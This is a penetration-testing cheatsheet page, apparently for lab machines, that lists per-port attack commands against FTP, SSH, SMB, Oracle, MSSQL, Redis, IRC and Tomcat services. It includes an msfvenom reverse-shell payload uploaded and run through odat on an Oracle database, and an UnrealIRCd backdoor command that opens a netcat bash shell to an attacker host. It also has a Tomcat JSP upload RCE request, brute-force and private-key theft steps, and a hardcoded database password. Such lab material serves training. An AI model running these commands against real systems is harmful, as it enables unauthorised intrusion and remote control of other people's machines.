coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page
  • TCP 21: FTP
  • TCP 22: SSH
  • TCP 53: DNS
  • TCP 79: Sun Solaris fingerd
  • TCP 80 & 443
  • TCP 110: POP3
  • UDP 116: SNMP
  • TCP 139 & 445: SMB
  • TCP 389: LDAP
  • TCP 1433: MSSQL
  • TCP 1521
  • TCP 4555: JAMES Remote Admin
  • TCP 5984: CouchDB 1.6.0
  • TCP 6379: Redis key-value store 4.0.9
  • TCP 8067: irc
  • TCP 8080
  • TCP 9256: AChat

Was this helpful?

  1. Cheatsheet

Ports

TCP 21: FTP

  • Check for anonymous login

  • Check if the version is vulnerable to some exploit (highly unlikely)

TCP 22: SSH

  • You won't be able to interact with SSH initially. Try to find the password and username by enumerating other ports.

  • If you can only find the username then use that username and brute-force ssh login with hydra.

  • If you have read permissions on /root/.ssh, then copy the id_rsa (private key) to your machine. Give the permission as 600 and then ssh with it.

ssh root@IP -i id_rsa

TCP 53: DNS

nslookup
> server 10.10.10.10
> 10.10.10.10
dig axfr cronos.htb @10.10.10.10
gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt

TCP 79: Sun Solaris fingerd

perl finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76

TCP 80 & 443

  • Directory Bruteforce

  • Nikto

  • Source Code

  • LFI/RFI

  • LOGIN- Weak Credentials, Default Login, SQLi, Bruteforce

  • Google(Searchsploit)- Application Name or any Keyword

TCP 110: POP3

telnet 10.10.10.10 110
>USER mindy
>PASS mindy
>list                    (list emails)
>retr 1                  (read email)

UDP 116: SNMP

snmpwalk -c public -v 1 10.10.10.10

The default community string is "public" (You might get it from nmap scan)

TCP 139 & 445: SMB

smbclient -L //10.10.10.10
smbclient //10.10.10.10/sharename
smbclient //10.10.10.10/sharename -U username
smbmap -H 10.10.10.10
enum4linux 10.10.10.10

TCP 389: LDAP

nmap -p 389 --script ldap-search

TCP 1433: MSSQL

sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

TCP 1521

Oracle TNS listener 11.2.0.2.0

Step 1: Enumerate Oracle System ID. 

python3 odat.py sidguesser -s 10.10.10.82 -p 1521

It will give you a list of strings such as "XE,XEXDB"

Step 2: Enumerate valid credentials.

python3 odat.py passwordguesser -s 10.10.10.82 -p1521 -d XE --accounts-file accounts/accounts_small.txt

If accounts dir doesn't work then use oracle_default_userpass.txt

Step 3: Create reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp  LHOST=10.10.14.4 LPORT=1234 -f exe > silo.exe

Step 4: Upload the shell to database.

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo.exe ~/silo.exe

If you get an error while uploading then check if user is given sysdba priv.

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp silo.exe ~/silo.exe --sysdba

Step 5: Run the shell on target machine.

python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp silo.exe --sysdba

TCP 4555: JAMES Remote Admin

nc 10.10.10.10 4555
> listusers
> setpassword mindy mindy

TCP 5984: CouchDB 1.6.0

Exploit:
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

TCP 6379: Redis key-value store 4.0.9

python redis.py 10.10.10.160 redis

TCP 8067: irc

UnrealIRC

nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.4 4444"  10.10.10.117

TCP 8080

Tomcat Login Page: 10.10.10.10/manager/html

Login to this page with credentials found. Then upload to war file to get a reverse shell

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)

curl -X PUT http://IP:8080/shell.jsp/ -d @- < shell.jsp

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)

python 42966.py -u http://IP:8080 -p pwn

TCP 9256: AChat

BoF exploit on eploitdb. Modify it to get shell

PreviousCheatsheetNextNmap

Last updated 2 years ago

Was this helpful?

Enumerate users:

You will need a tool:

Automated:

Manual:

https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl
https://github.com/quentinhardy/odat#installation-optional-for-development-version
https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py
https://medium.com/@bigb0ss/htb-postman-write-up-34bc4fe5daa